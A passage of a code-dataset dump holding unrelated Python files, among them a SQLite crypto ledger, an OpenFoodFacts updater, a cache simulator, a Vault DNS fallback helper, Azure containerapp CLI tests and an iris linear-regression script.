{}'.format(row[0], row[1])\n cryptosInverts.append(text)\n\n conn.close()\n return cryptosInverts\n\n\ndef printMovementsDB():\n #devuelve movimientos existentes en DB\n conn = sqlite3.connect(database)\n cursor = conn.cursor()\n\n rows= cursor.execute('select date, time, from_currency, from_quantity, to_currency, to_quantity from movements order by date;')\n\n movements = []\n for row in rows:\n row = list(row)\n movements.append(row)\n\n conn.close()\n return(movements) \n\ndef addNewMovement(data, time, from_currency, to_currency,from_quantity, to_quantity):\n #añadir nuevo movimiento en DB\n conn = sqlite3.connect(database)\n cursor = conn.cursor()\n\n query = '''\n INSERT INTO movements\n (date, time, from_currency, from_quantity, to_currency, to_quantity)\n values (?, ?, ?, ?, ?, ?);\n '''\n try:\n rows = cursor.execute(query, ( data,\n time,\n from_currency, \n from_quantity,\n to_currency,\n to_quantity,\n ))\n\n except sqlite3.Error as e:\n \n print('Error en base de datos : {}'.format(e))\n \n conn.commit()\n conn.close()\n\ndef MoneySpend(crypto, isfrom=True ):\n #busca en Base de Datos y devuelve la suma de las cantidades de una misma momenda en to (isfrom=false) o en from(isfrom=true) \n if isfrom:\n fieldSelect = 'from_quantity'\n fieldWhere = 'from_currency'\n else:\n fieldSelect = 'to_quantity'\n fieldWhere = 'to_currency'\n\n conn =sqlite3.connect(database)\n cursor = conn.cursor()\n \n query = '''\n SELECT {}\n FROM movements\n WHERE {} in ( SELECT id\n FROM cryptos\n WHERE symbol = ?);\n '''.format(fieldSelect, fieldWhere)\n\n try:\n rows=cursor.execute(query,(crypto,))\n valor=0\n try:\n for row in rows:\n valor+=row[0]\n except Exception as e:\n print('es en el for',e)\n \n except Exception as e:\n print('Error en base de datos:',e)\n conn.close()\n return(valor)\n\ndef getIdFromToCryptoDB(crypto, isCrytpo = True):\n # obteniendo el symbolo por el id o al reves dependiendo de si isCrypto\n if isCrytpo:\n fieldSelect = 'id'\n fieldWhere = 'symbol'\n else:\n fieldSelect = 'symbol'\n fieldWhere = 'id'\n \n conn = sqlite3.connect(database)\n cursor = conn.cursor()\n\n query='''\n SELECT {}\n FROM cryptos\n WHERE {}=?;\n '''.format(fieldSelect, fieldWhere)\n cursor.execute(query,(crypto,))\n n=cursor.fetchone()\n return (n[0])\n\ndef symbolCrytpo():\n #obteniendo los symbol de las cryptos de la tabla\n conn = sqlite3.connect(database)\n cursor = conn.cursor()\n\n query='''\n SELECT symbol\n FROM cryptos;\n '''\n rows=cursor.execute(query)\n symbol = []\n for row in rows:\n symbol.append(row[0])\n return (symbol)\n\n\n\n","sub_path":"movementsDB.py","file_name":"movementsDB.py","file_ext":"py","file_size_in_byte":5507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"512219634","text":"import requests\r\n\r\nfrom .models import Product, Favorite\r\nfrom django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned\r\n\r\nURL = 'https://world.openfoodfacts.org/language/french/'\r\n\r\ndef update_product(product_origin, product_updated):\r\n\t\"\"\"Replace all attributes of the object in the database by the attributes of the object build from OPC\"\"\"\r\n\tfor key in product_origin.__dict__:\r\n\t\tif key == 'id':\r\n\t\t\tcontinue\r\n\t\telse:\r\n\t\t\tproduct_origin.__dict__[key] = product_updated.__dict__[key]\r\n\treturn product_origin\r\n\r\ndef update_db():\r\n\t\"\"\"Function use to get all french products in the openfoodfacts database\"\"\"\r\n\tlast_page = False\r\n\ti = 1\r\n\twhile not last_page:\r\n\t\turl = URL + str(i) +'.json'\r\n\t\tdata = requests.get(url)\r\n\t\tdata = data.json()\r\n\t\tif data['products'] == []:\r\n\t\t\tlast_page = True\r\n\t\telse:\r\n\t\t\tfor product in data['products']:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tname = product['product_name']\r\n\t\t\t\t\tnutriscore = product['nutrition_grades']\r\n\t\t\t\t\tpicture = product['image_url']\r\n\t\t\t\t\tcategory = product['categories']\r\n\t\t\t\t\turl = product['url']\r\n\t\t\t\t\tpicture_nutrition = product['image_nutrition_url']\r\n\r\n\t\t\t\t\tif category == \"\" or name == \"\" or nutriscore == \"\" or picture == \"\" or url == \"\" or picture_nutrition == \"\":\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tproduct_to_save = Product(name=name, picture=picture, category=category, nutriscore=nutriscore, url=url, picture_nutrition=picture_nutrition)\r\n\r\n\t\t\t\t\t\ttry:\r\n\t\t\t\t\t\t\tproduct_to_update = Product.objects.get(id=product_to_save.id)\r\n\t\t\t\t\t\t\tproduct_to_update = update_product(product_to_update, product_to_save)\r\n\t\t\t\t\t\t\tproduct_to_update.save()\r\n\r\n\r\n\t\t\t\t\t\texcept ObjectDoesNotExist:\r\n\t\t\t\t\t\t\tproduct_to_save.save()\r\n\r\n\t\t\t\t\t\texcept MultipleObjectsReturned:\r\n\t\t\t\t\t\t\tcontinue\r\n\r\n\t\t\t\texcept KeyError:\r\n\t\t\t\t\tcontinue\r\n\t\t\ti = i+1\r\n\tprint('Mise à jour de la base terminée !')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tupdate_db()\r\n","sub_path":"store/update_db.py","file_name":"update_db.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"163420295","text":"T = int(input())\r\n\r\nfor CC in range(T):\r\n R, C, W = map(int,input().split())\r\n\r\n RowsN = C//W\r\n\r\n Find = False\r\n Ans = 0\r\n \r\n if W == 1:\r\n Ans = R*C\r\n Find = True\r\n\r\n if not Find:\r\n if C%W == 0:\r\n Ans = RowsN*R + W - 1\r\n else:\r\n Ans = RowsN*R + W\r\n\r\n print('Case #{}: {}'.format(CC+1,Ans))\r\n","sub_path":"solutions_5640146288377856_1/Python/BluElist/As.py","file_name":"As.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"465111930","text":"#This is a sample phone book program\n#Vincent Broyles is the author!\nnorth_area_codes = ('619','858','760','818')\nsouth_area_codes = ('343','676','232','979')\n\nnames = []\nnumbers = []\nzips_areas = {92029:858,92014:858,92020:619,92021:619,92057:760}\n\n\ndef get_full_name():\n first_name = input('What is your first name?')\n last_name = input ('What is your last name?')\n full_name = (first_name + ' ' + last_name)\n return full_name\n\ndef get_phone_number():\n area_code = input('Area Code?')\n '''\n if area_code not in north_area_codes:\n print ('Area code not covered1.')\n return\n if area_code not in south_area_codes:\n print ('Area code not covered2.')\n return\n '''\n phone_number = input('Phone number?')\n full_entry = ('(' + area_code + ')' + phone_number)\n return full_entry\n\ndef link_area_to_zip_code():\n print(\"Hi\")\n \n\n#Ask the data entry person how many numbers they want to enter\niterations = input ('How many numbers to enter?')\nint_iterations = int(iterations)\nprint(int_iterations)\n\nfor i in range(int_iterations):\n ''' run the functions to get the\n name and the numbers, and then\n append that onto the running list\n '''\n temp_name = get_full_name()\n names.append(temp_name)\n temp_number = get_phone_number()\n numbers.append(temp_number)\n try:\n print (temp_name + ' ' + temp_number)\n except(TypeError):\n print ('There was a problem, try again.')\n\nprint ('Here is the full list:')\n\n#Now print out the full array of names and numbers\nfor i in range(int_iterations):\n print (names[i] + ' ' + numbers[i])\n\n \n","sub_path":"phone_book_1.py","file_name":"phone_book_1.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"643403814","text":"#Kevin Sherman\n#Daniel Stambler\n#ksherma6@jhu.edu\n#dstambl2@jhu.edu\n\nimport sys\nimport math\nfrom Cache import Cache\n\n#Checks that command line args are valid\ndef check_validity_of_args(set, block, byte, w_a, w_t, least_recent, input_file):\n\n #masks to check powers of 2\n set_mask = set - 1\n block_mask = block -1\n byte_mask = byte - 1\n set_result = set & set_mask\n block_result = block & block_mask\n byte_result = byte & byte_mask\n\n if w_a != 0 and w_a != 1:\n raise ValueError(\"Improper command line arg\")\n exit(0)\n if w_t != 0 and w_t != 1:\n raise ValueError(\"Improper command line arg\")\n exit(0)\n if least_recent != 0 and least_recent != 1:\n raise ValueError(\"Improper command line arg\")\n exit(0)\n if w_a == 0 and w_t == 0:\n raise ValueError(\"Improper command line arg\")\n exit(0)\n if byte < 0 or set_result != 0:\n raise ValueError(\"Improper command line arg\")\n exit(0)\n if byte < 0 or block_result != 0:\n raise ValueError(\"Improper command line arg\")\n exit(0)\n if byte < 4 or byte_result != 0:\n raise ValueError(\"Improper command line arg\")\n exit(0)\n file_check = input_file.split(\".\")\n if file_check[1] != \"trace\":\n raise ValueError(\"Improper command line arg\")\n exit(0)\n\ndef getMemVals(mem, ind, off):\n mem_int = int(mem, 0)\n mem_int = mem_int >> off\n x=0\n x = 1 << (ind)\n x -= 1\n ind_val = mem_int & x\n tag = mem_int >> ind\n return ind_val, tag\n\ndef readfile(filename, index, offset, myCache):\n with open(filename) as f:\n for line in f:\n input = (str(line)).split(\" \")\n s1 = input[0]\n mem_address = input[1]\n ind_val, tag = getMemVals(mem_address, index, offset)\n if s1 == 'l':\n myCache.load(tag, ind_val)\n elif s1 == 's':\n myCache.store(tag, ind_val)\n else:\n raise ValueError(\"Load and Save must be l or s\")\n exit(0)\n\ndef main():\n if len(sys.argv) != 8:\n raise ValueError(\"Too many or too few arguments\")\n exit(0)\n num_sets = int(sys.argv[1])\n num_blocks = int(sys.argv[2])\n num_bytes = int(sys.argv[3])\n write_allocate_or_not = int(sys.argv[4])\n write_through_or_back = int(sys.argv[5])\n eviction = int(sys.argv[6])\n input_file = sys.argv[7]\n\n check_validity_of_args(num_sets, num_blocks, num_bytes, write_allocate_or_not, write_through_or_back, eviction, input_file)\n\n #get index and offset\n index = int(math.log(num_sets,2))\n offset = int(math.log(num_bytes,2))\n\n simpleCache = Cache(num_sets, num_blocks, num_bytes, write_allocate_or_not, write_through_or_back, eviction)\n readfile(input_file, index, offset, simpleCache)\n\n total_load, total_store, load_hits, load_miss, store_hits, store_miss, total_cycles = simpleCache.get_cycles()\n print(\"Total loads: \" + str(total_load))\n print(\"Total stores: \" + str(total_store))\n print(\"Load hits: \" + str(load_hits))\n print(\"Load misses: \" + str(load_miss))\n print(\"Store hits: \" + str(store_hits))\n print(\"Store misses: \" + str(store_miss))\n print(\"Total cycles: \" + str(int(total_cycles)))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"csim.py","file_name":"csim.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"331967143","text":"from test_lightsaft import LightSAFTPredictor\n\n# a light-weight version of LaSAFT+GPoCM\n\n\"\"\"\n@inproceedings{choi2021lasaft,\n title={LaSAFT: Latent Source Attentive Frequency Transformation for Conditioned Source Separation},\n author={Choi, Woosung and Kim, Minseok and Chung, Jaehwa and Jung, Soonyoung},\n booktitle={ICASSP 2021-2021 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP)},\n pages={171--175},\n year={2021},\n organization={IEEE}\n}\n\"\"\"\n\n# Github Repository: https://github.com/ws-choi/music-demixing-challenge-starter-kit\n# Github Repository of the original paper: https://github.com/ws-choi/Conditioned-Source-Separation-LaSAFT\n# Demonstration site of the original paper: https://lasaft.github.io/\n\nlightsaft_predictor = LightSAFTPredictor()\nsubmission = lightsaft_predictor\nsubmission.run()\nprint(\"Successfully completed music demixing...\")\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"369168629","text":"\ndef run():\n n = int (input(\"Ingrese un numero: \"))\n tabla = []\n potencia = 0\n frac = 0\n suma = 0\n\n for i in range(1,n+1):\n potencia = i \n frac = 1/(2**i)\n suma += frac\n tabla.append([potencia,frac,suma])\n print (\"Potencia --- Fraccion ----------- Suma\")\n x=n\n c=0\n for i in range(n):\n if c < 9:\n print(\"{} ---------- {} --{} {}\".format(tabla[i][0],tabla[i][1],\"-\"*(x-1),tabla[i][2] ))\n x-=1\n c+=1\n elif c >= 9:\n print(\"{} --------- {} --{} {}\".format(tabla[i][0],tabla[i][1],\"-\"*(x-1),tabla[i][2] ))\n x-=1\n c+=1\n \n\n\nif __name__ == \"__main__\":\n run()","sub_path":"Ejercicios/Ciclos/SumaFracionDos.py","file_name":"SumaFracionDos.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"385319229","text":"#!/usr/bin/env python\n\nimport logging\nimport sys\nimport os\nimport requests\nfrom urllib3.util.retry import Retry\nfrom requests.adapters import HTTPAdapter\nimport socket\n\nroot = logging.getLogger()\nroot.setLevel(logging.DEBUG)\n\nch = logging.StreamHandler(sys.stdout)\nch.setLevel(logging.DEBUG)\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\nch.setFormatter(formatter)\nroot.addHandler(ch)\n\ndef get_logger(): \n return root\n\ndef retry_session(retries, session=None, backoff_factor=0.3, status_forcelist=(500, 502, 503, 504)):\n session = session or requests.Session()\n retry = Retry(\n total=retries,\n read=retries,\n connect=retries,\n backoff_factor=backoff_factor,\n status_forcelist=status_forcelist,\n method_whitelist=['HEAD', 'TRACE', 'GET', 'PUT', 'OPTIONS', 'DELETE', 'POST'],\n raise_on_status=False\n )\n adapter = HTTPAdapter(max_retries=retry)\n session.mount('http://', adapter)\n session.mount('https://', adapter)\n return session\n\ndef verify_expected_vars(expected_vars):\n root.info(msg='Verifying all expected variables exist: {}'.format(expected_vars))\n for v in expected_vars:\n if not os.getenv(v):\n root.critical(msg=\"{} environment variable is NOT SET!\".format(v))\n exit(77)\n else:\n root.debug(msg='{} environment variable is set with value {}'.format(v, os.getenv(v)))\n\n\ndef hostname_resolution(VAULT_ADDR):\n VAULT_RESOLV=VAULT_ADDR.split(\"//\")[1].split(\":\")[0]\n logging.info(VAULT_RESOLV)\n\n print('Trying to resolve {}:'.format(VAULT_RESOLV))\n try:\n VAULT_IP=socket.gethostbyname(VAULT_RESOLV)\n logging.debug(VAULT_IP)\n print('Successful in getting vault ip DNS is working fine:',VAULT_IP)\n print(\"Url passed will be: \",VAULT_ADDR)\n return VAULT_ADDR\n \n except socket.gaierror as error:\n logging.critical(\"Unable to get VAULT_IP from vault address, Hardcoded ip will be used\")\n print(\"There was error in resolving {}\".format(VAULT_RESOLV))\n print(error)\n logging.info(\"Trying with Hardcoded ip\")\n if 'edc' in VAULT_ADDR:\n VAULT_IP = 'https://10.123.82.190:8300'\n return VAULT_IP\n elif 'ukedc' in VAULT_ADDR:\n VAULT_IP = 'https://10.113.188.253:8300'\n return VAULT_IP\n elif 'ndc' in VAULT_ADDR:\n VAULT_IP = 'https://10.121.83.103:8300'\n return VAULT_IP\n elif 'ukndc' in VAULT_ADDR:\n VAULT_IP = 'https://10.113.186.253:8300'\n return VAULT_IP\n except:\n logging.critical(\"Unable to reach vault, please check vault if vault is up:\")\n","sub_path":"windows/commonutil.py","file_name":"commonutil.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"63959274","text":"from mesh_module import *\nimport visualize as viz\nimport sys\nimport os\n\nfaces = ['front', 'left', 'right', 'bottom', 'top']\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 3:\n print(\"How to use: > run.py 'fisheye model type' 'resolution'\")\n print(\"ex) run.py equidistance 64\")\n exit()\n\n fisheye_type = sys.argv[1]\n resolution = int(sys.argv[2])\n square_obj_dir = \"square_objs\"\n fish_obj_dir = \"fish_objs\"\n if not os.path.exists(square_obj_dir):\n os.makedirs(square_obj_dir)\n\n if not os.path.exists(fish_obj_dir):\n os.makedirs(fish_obj_dir)\n\n fish_meshes = []\n for face in faces:\n s_mesh = SquareMesh(face, resolution)\n s_mesh.write_obj(\"%s/%s\" % (square_obj_dir, face))\n f_mesh = FishMesh(fisheye_type, s_mesh)\n f_mesh.write_obj(\"%s/%s\" % (fish_obj_dir, face))\n fish_meshes.append(f_mesh)\n\n viz.visualize_fisheye_mesh(fish_meshes, faces, ['b', 'r', 'y', 'c', 'm'])\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"631123024","text":"#!/usr/bin/env python\n\nfrom itertools import combinations\nfrom itertools import permutations\n\npeople = ['M', 'F', 'A', 'B', 'C']\n\n\ndef is_child(a):\n if a in ['A', 'B', 'C']:\n return True\n return False\n\ndef child_is_next_to_child(arr):\n #print(arr)\n for idx,x in enumerate(arr):\n #print(idx,x)\n if idx == len(arr) - 1:\n break\n if is_child(x) and is_child(arr[idx+1]):\n return True\n #if idx == len(arr) and is_child(x) and is_child(arr[x-1]):\n # return True\n print(arr)\n return False\n\ndef main():\n people = ['M', 'F', 'A', 'B', 'C']\n #combos = [x for x in combinations(people, len(people))]\n perms = [x for x in permutations(people, len(people))]\n\n bad = [x for x in perms if child_is_next_to_child(x)]\n good = [x for x in perms if not child_is_next_to_child(x)]\n\n print('bad: %s' % len(bad))\n print('good: %s' % len(good))\n #import epdb; epdb.st()\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"extras/C960/PA_32.py","file_name":"PA_32.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"16111676","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nimport os\nimport time\nfrom time import sleep\nfrom azure.cli.testsdk import (ScenarioTest, ResourceGroupPreparer, JMESPathCheck, live_only)\nfrom subprocess import run\n\nfrom .common import (write_test_file, TEST_LOCATION, clean_up_test_file)\nfrom .utils import create_containerapp_env\n\nTEST_DIR = os.path.abspath(os.path.join(os.path.abspath(__file__), '..'))\n\n\nclass ContainerappPreviewScenarioTest(ScenarioTest):\n def __init__(self, method_name, config_file=None, recording_name=None, recording_processors=None,\n replay_processors=None, recording_patches=None, replay_patches=None, random_config_dir=False):\n\n super().__init__(method_name, config_file, recording_name, recording_processors, replay_processors,\n recording_patches, replay_patches, random_config_dir)\n cmd = ['azdev', 'extension', 'add', 'connectedk8s']\n run(cmd, check=True)\n cmd = ['azdev', 'extension', 'add', 'k8s-extension']\n run(cmd, check=True)\n # Wait for extensions to be installed\n # We mock time.sleep in azure-sdk-tools, that's why we need to use sleep here.\n sleep(120)\n\n @ResourceGroupPreparer(location=\"eastus\", random_name_length=15)\n def test_containerapp_preview_environment_type(self, resource_group):\n self.cmd('configure --defaults location={}'.format(TEST_LOCATION))\n aks_name = \"my-aks-cluster\"\n connected_cluster_name = \"my-connected-cluster\"\n custom_location_id = None\n try:\n self.cmd(f'aks create --resource-group {resource_group} --name {aks_name} --enable-aad --generate-ssh-keys --enable-cluster-autoscaler --min-count 4 --max-count 10 --node-count 4')\n self.cmd(f'aks get-credentials --resource-group {resource_group} --name {aks_name} --overwrite-existing --admin')\n\n self.cmd(f'connectedk8s connect --resource-group {resource_group} --name {connected_cluster_name}')\n connected_cluster = self.cmd(f'az connectedk8s show --resource-group {resource_group} --name {connected_cluster_name}').get_output_in_json()\n\n connected_cluster_id = connected_cluster.get('id')\n extension = self.cmd(f'az k8s-extension create'\n f' --resource-group {resource_group}'\n f' --name containerapp-ext'\n f' --cluster-type connectedClusters'\n f' --cluster-name {connected_cluster_name}'\n f' --extension-type \"Microsoft.App.Environment\" '\n f' --release-train stable'\n f' --auto-upgrade-minor-version true'\n f' --scope cluster'\n f' --release-namespace appplat-ns'\n f' --configuration-settings \"Microsoft.CustomLocation.ServiceAccount=default\"'\n f' --configuration-settings \"appsNamespace=appplat-ns\"'\n f' --configuration-settings \"clusterName={connected_cluster_name}\"'\n f' --configuration-settings \"envoy.annotations.service.beta.kubernetes.io/azure-load-balancer-resource-group={resource_group}\"').get_output_in_json()\n custom_location_name = \"my-custom-location\"\n custom_location_id = self.cmd(f'az customlocation create -g {resource_group} -n {custom_location_name} -l {TEST_LOCATION} --host-resource-id {connected_cluster_id} --namespace appplat-ns -c {extension[\"id\"]}').get_output_in_json()['id']\n except Exception as e:\n pass\n\n # create connected environment with client or create a command for connected?\n sub_id = self.cmd('az account show').get_output_in_json()['id']\n\n connected_env_name = 'my-connected-env'\n connected_env_resource_id = f\"/subscriptions/{sub_id}/resourceGroups/{resource_group}/providers/Microsoft.App/connectedEnvironments/{connected_env_name}\"\n file = f\"{resource_group}.json\"\n env_payload = '{{ \"location\": \"{location}\", \"extendedLocation\": {{ \"name\": \"{custom_location_id}\", \"type\": \"CustomLocation\" }}, \"Properties\": {{}}}}' \\\n .format(location=TEST_LOCATION, custom_location_id=custom_location_id)\n write_test_file(file, env_payload)\n self.cmd(f'az rest --method put --uri \"{connected_env_resource_id}?api-version=2022-06-01-preview\" --body \"@{file}\"')\n containerapp_env = self.cmd(f'az rest --method get --uri \"{connected_env_resource_id}?api-version=2022-06-01-preview\"').get_output_in_json()\n while containerapp_env[\"properties\"][\"provisioningState\"].lower() != \"succeeded\":\n time.sleep(5)\n containerapp_env = self.cmd(\n f'az rest --method get --uri \"{connected_env_resource_id}?api-version=2022-06-01-preview\"').get_output_in_json()\n\n ca_name = self.create_random_name(prefix='containerapp', length=24)\n self.cmd(\n f'az containerapp create --name {ca_name} --resource-group {resource_group} --environment {connected_env_name} --image \"mcr.microsoft.com/k8se/quickstart:latest\" --environment-type connected',\n checks=[\n JMESPathCheck('properties.environmentId', connected_env_resource_id),\n JMESPathCheck('properties.provisioningState', \"Succeeded\")\n ])\n ca_name2 = self.create_random_name(prefix='containerapp', length=24)\n self.cmd(\n f'az containerapp create --name {ca_name2} --resource-group {resource_group} --environment {connected_env_resource_id} --image \"mcr.microsoft.com/k8se/quickstart:latest\" --environment-type connected',\n checks=[\n JMESPathCheck('properties.environmentId', connected_env_resource_id),\n JMESPathCheck('properties.provisioningState', \"Succeeded\")\n ])\n\n # test show/list/delete\n self.cmd('containerapp list -g {}'.format(resource_group), checks=[\n JMESPathCheck('length(@)', 2)\n ])\n\n self.cmd('containerapp list -g {} --environment-type {}'.format(resource_group, 'connected'), checks=[\n JMESPathCheck('length(@)', 2)\n ])\n\n self.cmd('containerapp list -g {} --environment-type {} --environment {}'.format(resource_group, 'connected', connected_env_name), checks=[\n JMESPathCheck('length(@)', 2)\n ])\n\n self.cmd('containerapp list -g {} --environment-type {}'.format(resource_group, 'managed'), checks=[\n JMESPathCheck('length(@)', 0)\n ])\n\n app2 = self.cmd('containerapp show -n {} -g {}'.format(ca_name2, resource_group)).get_output_in_json()\n self.cmd('containerapp delete --ids {} --yes'.format(app2['id']))\n\n self.cmd('containerapp delete -n {} -g {} --yes'.format(ca_name, resource_group))\n\n self.cmd('containerapp list -g {}'.format(resource_group), checks=[\n JMESPathCheck('length(@)', 0)\n ])\n clean_up_test_file(file)\n\n @ResourceGroupPreparer(location=\"eastus\")\n def test_containerapp_preview_e2e(self, resource_group):\n self.cmd('configure --defaults location={}'.format(TEST_LOCATION))\n\n env_name = self.create_random_name(prefix='containerapp-env', length=24)\n ca_name = self.create_random_name(prefix='containerapp', length=24)\n\n create_containerapp_env(self, env_name, resource_group)\n\n containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()\n\n self.cmd(\n f'az containerapp create --name {ca_name} --resource-group {resource_group} --environment {env_name} --image \"mcr.microsoft.com/k8se/quickstart:latest\" --environment-type managed',\n checks=[\n JMESPathCheck('properties.environmentId', containerapp_env['id']),\n JMESPathCheck('properties.provisioningState', \"Succeeded\")\n ])\n\n app = self.cmd(\n 'containerapp show -n {} -g {}'.format(ca_name, resource_group),\n checks=[\n JMESPathCheck('properties.environmentId', containerapp_env['id']),\n JMESPathCheck('properties.provisioningState', \"Succeeded\"),\n JMESPathCheck('name', ca_name),\n ]\n ).get_output_in_json()\n\n self.cmd('containerapp list -g {}'.format(resource_group), checks=[\n JMESPathCheck('length(@)', 1)\n ])\n\n self.cmd('containerapp list -g {} --environment-type {}'.format(resource_group, 'managed'), checks=[\n JMESPathCheck('length(@)', 1)\n ])\n\n self.cmd('containerapp delete --ids {} --yes'.format(app['id']))\n\n self.cmd('containerapp list -g {}'.format(resource_group), checks=[\n JMESPathCheck('length(@)', 0)\n ])\n","sub_path":"src/containerapp/azext_containerapp/tests/latest/test_containerapp_preview_scenario.py","file_name":"test_containerapp_preview_scenario.py","file_ext":"py","file_size_in_byte":9214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"454417945","text":"\r\n\"\"\"\r\nCreated on Wed Aug 25 12:52:52 2021\r\nAI and deep learnin with Python\r\nData types and operators\r\nQuiz Data types and Operators \r\n\r\n\"\"\"\r\n# The current volume of a water reservoir is ( in cubic meters)\r\nreservoir_volume = 4.445e8\r\n\r\n# The amount of rainfall from a storm (in cubic meters)\r\nrainfall = 5e6\r\n\r\n# Decrease the rainfall variable by 10% to account for runoff\r\nrainfall *= 0.9 \r\n\r\n# add the rainfall variable to the reservoir_volume variable\r\nreservoir_volume += rainfall\r\n\r\nprint(reservoir_volume)","sub_path":"PythonProgramming/DataTypesOperatorsQuiz.py","file_name":"DataTypesOperatorsQuiz.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"38111311","text":"'''\nName : Niya Jaison\nThe program does:\n 1. Training a model via linear regression\n 2. Using the trained model to do the classification\n 3. Calcualte the best N value to choose for N-fold cross validation\n\n'''\nimport pandas as data\nimport numpy\n\n# Reading the data from the iris and adding the feature names\n\nfeatureName = ['sepalLength', 'sepalWidth', 'petalLength', 'petalWidth', 'flowerClass']\n\nirisData = data.read_csv('iris_data.csv',header = None,names = featureName)\n#print(irisData)\nfoldValues=[3,5,10]\n\n# Splitting data in to X and Y\n\nX = irisData[['sepalLength', 'sepalWidth', 'petalLength', 'petalWidth']]\n#X = irisData[[0,1,2,3]]\n#print(X.values)\nY =irisData.flowerClass.map({'Iris-setosa':1.0,'Iris-versicolor':2.0,'Iris-virginica':3.0})\nfoldAccuracy=[0.0,0.0,0.0]\ncorrect_label=0\np=0\nfold_accuracy_per_fold=[0]\n# Performing k-fold cross validation\nfor i in foldValues :\n del fold_accuracy_per_fold[0:len(fold_accuracy_per_fold)] \n splitValue = len(X)/i #calculating the intervals based of the k-fold k value\n #print(splitValue)\n for j in range(i) :\n splt_lower=int(j*splitValue)\n splt_upper=int((j+1)*splitValue)\n # Choosing the \n xTest=numpy.array(X[splt_lower:splt_upper])\n yTest=numpy.array(Y[splt_lower:splt_upper])\n xTrain =list(X.values)\n yTrain=list(Y.values)\n del xTrain[splt_lower : splt_upper : 1]\n del yTrain[splt_lower : splt_upper : 1]\n # del xTrain[2:3]\n # print(len(xTrain))\n xTrain= numpy.array(xTrain)\n yTrain= numpy.array(yTrain) \n # beta = (X'X)^-1 X'Y - Creating a training Model\n beta = numpy.row_stack(numpy.dot(numpy.dot(numpy.linalg.inv(numpy.dot(xTrain.T,xTrain)),xTrain.T),yTrain))\n\n #print(beta)\n\n # Calculating Y = X. beta - Performing Classification\n\n yTest_pred =numpy.row_stack( numpy.dot(xTest,beta))\n \n '''print(yTest_pred)\n #print(numpy.round(yTest_pred))\n #print(len(yTest))\n #print(len(yTest_pred))'''\n \n yTest_pred = numpy.round(yTest_pred) # Rounding of the predicted value to the nearest whole number( labels -1 or 2 or 3)\n for k in range(len(yTest_pred)) : # Checking the accuracy of the predicted y value with actual y value\n if(yTest_pred[k] == yTest[k]) :\n correct_label +=1\n fold_accuracy_per_fold.insert(j,correct_label/splitValue)\n correct_label=0\n #print(fold_accuracy_per_fold)\n foldAccuracy.insert(p,sum(fold_accuracy_per_fold)/(len(fold_accuracy_per_fold)))\n p+=1\n #print(foldAccuracy)\n del fold_accuracy_per_fold[0:len(fold_accuracy_per_fold)] # clearing the list to store the accuarcy of each of the fold\n #print(fold_accuracy_per_fold) \n \nhighest_accuracy_fold = foldAccuracy.index(max(foldAccuracy)) # finding the index of the fold accuracy which has max value\n#print(foldAccuracy)\n\nprint('Selected N value (in N-fold) for cross validation :',foldValues[highest_accuracy_fold],'(Accuracy : ',foldAccuracy[2]*100,'%)\\n')\n\nfor l in range(foldValues[highest_accuracy_fold]) :\n splt_lower=int(l*splitValue)\n splt_upper=int((l+1)*splitValue)\n # Choosing the \n xTest=numpy.array(X[splt_lower:splt_upper])\n yTest=numpy.array(Y[splt_lower:splt_upper])\n xTrain =list(X.values)\n yTrain=list(Y.values)\n del xTrain[splt_lower : splt_upper : 1]\n del yTrain[splt_lower : splt_upper : 1]\n # del xTrain[2:3]\n # print(len(xTrain))\n xTrain= numpy.array(xTrain)\n yTrain= numpy.array(yTrain) \n # beta = (X'X)^-1 X'Y - Creating a training Model\n beta = numpy.row_stack(numpy.dot(numpy.dot(numpy.linalg.inv(numpy.dot(xTrain.T,xTrain)),xTrain.T),yTrain))\n print('Values calculated when considering section ',l+1,' as test data:\\n')\n print('Beta for the test data:\\n',beta)\n\n # Calculating Y = X. beta - Performing Classification\n\n yTest_pred =numpy.row_stack( numpy.dot(xTest,beta))\n \n '''print(yTest_pred)\n #print(numpy.round(yTest_pred))\n #print(len(yTest))\n #print(len(yTest_pred))'''\n \n yTest_pred = numpy.round(yTest_pred)\n print('Test Value :\\n',xTest)\n print('Predicted Value:\\n',yTest_pred)\n # 